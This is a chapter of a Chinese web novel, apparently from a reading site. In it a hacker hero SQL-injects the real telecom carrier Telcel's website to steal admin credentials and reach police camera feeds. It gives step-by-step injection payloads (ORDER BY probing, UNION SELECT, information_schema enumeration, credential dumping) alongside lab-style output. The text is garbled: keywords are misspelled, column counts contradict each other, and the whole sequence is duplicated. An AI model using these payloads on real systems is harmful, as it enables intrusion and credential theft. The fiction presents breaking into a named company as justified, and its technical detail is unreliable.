关灯
护眼
字体:
大
中
小
第32章 “德州电锯杀人狂”藏身养猪场,网络黑客追凶主持正义
王涛是网络安全专业的毕业生。
首先想到的就是利用网络查询。
通过路口的监控摄像头确定绑匪的活动轨迹。
墨西哥城警务系统采用的是Telcel电信公司的数据网络。
入侵Telcel机房,内网渗透,目录遍历。
找到监控摄像头数据。
王涛离开酒店。
在没有监控的街角,买了20部Telcel的预充值手机。
回到酒店。
打开自己的笔记本电脑。
启动VMware Workstation虚拟机。
查询到Telcel官方网站。
点击页面的充值链接。
登录采用的是短信验证功能。
在登录界面输入’。
页面提示 “near '%'' at line 1”。
充值数据库存在注入漏洞。
查询数据库的字段。
’order by 12# 显示Error: Unknown column '12' in 'order clause'
第12行没有漏洞。
继续测试。
’order by 11# 显示Error: Unknown column '11' in 'order clause'
第11行也没有漏洞。
继续测试到第9行的时候发现了漏洞。
' order by 7 #
Tile Relese Chaacter Gere qwas
World War Z Gery Lne horr asxz
The Drk Kight Ries Buce Wyne action asxz
The Amazing Spider-Man Peter Paker action asxz
The Inredible Hulk Brce Banner acton asxz
The Fst ad the Furious Brian O'Connor actin asxz
Iron Mn Toy Strk actin asxz
Ma of Stel Clrk Ket acion asxz
G.I. Je: Retlition Cora Commnder acton asxz
Termnator Salation Jhn Conor si-fi asxz
6个字段
继续查询可显示的字段数。
-1' union select 1,2,3,4,5,6,7 #
Tile Relase Carater Gere Ib
2 3 5 4 Lnk
2,3,4,5 为可显示字段
爆破数据库。
1' unon seect 1,daabse,3,4,5,6,7 #
Tile Reease Chaacter Gnre IMb
3 2 3 5 4 Lik 没有爆出数据库
1' unon selet 1,dtabase,3,4,5,6,7 #
Ttle Relse Chracer Gre IMb
qwas 3 5 4 Lik
库名:qwas
爆破数据库的关键内容。
-1' unon selct 1,colmn_nme,3,4,5,6,7 fom infrmation_shema.colums whee tble_scema=dataase nd tale_nme='usrs'#
Tile Relese Chaacter Gere IDb
id 1 2 6 Lik
login 1 2 6 Lik
password 1 2 6 Lik
Eail 1 2 6 Lik
seret 1 2 6 Lik
actiatio_code 1 2 6 Lik
actvated 1 2 6 Lik
admin 1 2 6 Lik
一共8个字段,确定 login,admin,password
查询字段内容。
-1' union select 1,login,password,4,admin,6,7 from qwas .users#
Ttle Relese Charcter Gere IDb
B.I.M. fcf045affd0 1 Lnk
qwas fe5839c735df045affd0 1 5 Lnk
一共两个。
解密。
B. I.M. Telcel
qwas Telcel
王涛利用注入漏洞爆破出来的管理员密码。
首先想到的就是利用网络查询。
通过路口的监控摄像头确定绑匪的活动轨迹。
墨西哥城警务系统采用的是Telcel电信公司的数据网络。
入侵Telcel机房,内网渗透,目录遍历。
找到监控摄像头数据。
王涛离开酒店。
在没有监控的街角,买了20部Telcel的预充值手机。
回到酒店。
打开自己的笔记本电脑。
启动VMware Workstation虚拟机。
查询到Telcel官方网站。
点击页面的充值链接。
登录采用的是短信验证功能。
在登录界面输入’。
页面提示 “near '%'' at line 1”。
充值数据库存在注入漏洞。
查询数据库的字段。
’order by 12# 显示Error: Unknown column '12' in 'order clause'
第12行没有漏洞。
继续测试。
’order by 11# 显示Error: Unknown column '11' in 'order clause'
第11行也没有漏洞。
继续测试到第9行的时候发现了漏洞。
' order by 7 #
Tile Relese Chaacter Gere qwas
World War Z Gery Lne horr asxz
The Drk Kight Ries Buce Wyne action asxz
The Amazing Spider-Man Peter Paker action asxz
The Inredible Hulk Brce Banner acton asxz
The Fst ad the Furious Brian O'Connor actin asxz
Iron Mn Toy Strk actin asxz
Ma of Stel Clrk Ket acion asxz
G.I. Je: Retlition Cora Commnder acton asxz
Termnator Salation Jhn Conor si-fi asxz
6个字段
继续查询可显示的字段数。
-1' union select 1,2,3,4,5,6,7 #
Tile Relase Carater Gere Ib
2 3 5 4 Lnk
2,3,4,5 为可显示字段
爆破数据库。
1' unon seect 1,daabse,3,4,5,6,7 #
Tile Reease Chaacter Gnre IMb
3 2 3 5 4 Lik 没有爆出数据库
1' unon selet 1,dtabase,3,4,5,6,7 #
Ttle Relse Chracer Gre IMb
qwas 3 5 4 Lik
库名:qwas
爆破数据库的关键内容。
-1' unon selct 1,colmn_nme,3,4,5,6,7 fom infrmation_shema.colums whee tble_scema=dataase nd tale_nme='usrs'#
Tile Relese Chaacter Gere IDb
id 1 2 6 Lik
login 1 2 6 Lik
password 1 2 6 Lik
Eail 1 2 6 Lik
seret 1 2 6 Lik
actiatio_code 1 2 6 Lik
actvated 1 2 6 Lik
admin 1 2 6 Lik
一共8个字段,确定 login,admin,password
查询字段内容。
-1' union select 1,login,password,4,admin,6,7 from qwas .users#
Ttle Relese Charcter Gere IDb
B.I.M. fcf045affd0 1 Lnk
qwas fe5839c735df045affd0 1 5 Lnk
一共两个。
解密。
B. I.M. Telcel
qwas Telcel
王涛利用注入漏洞爆破出来的管理员密码。
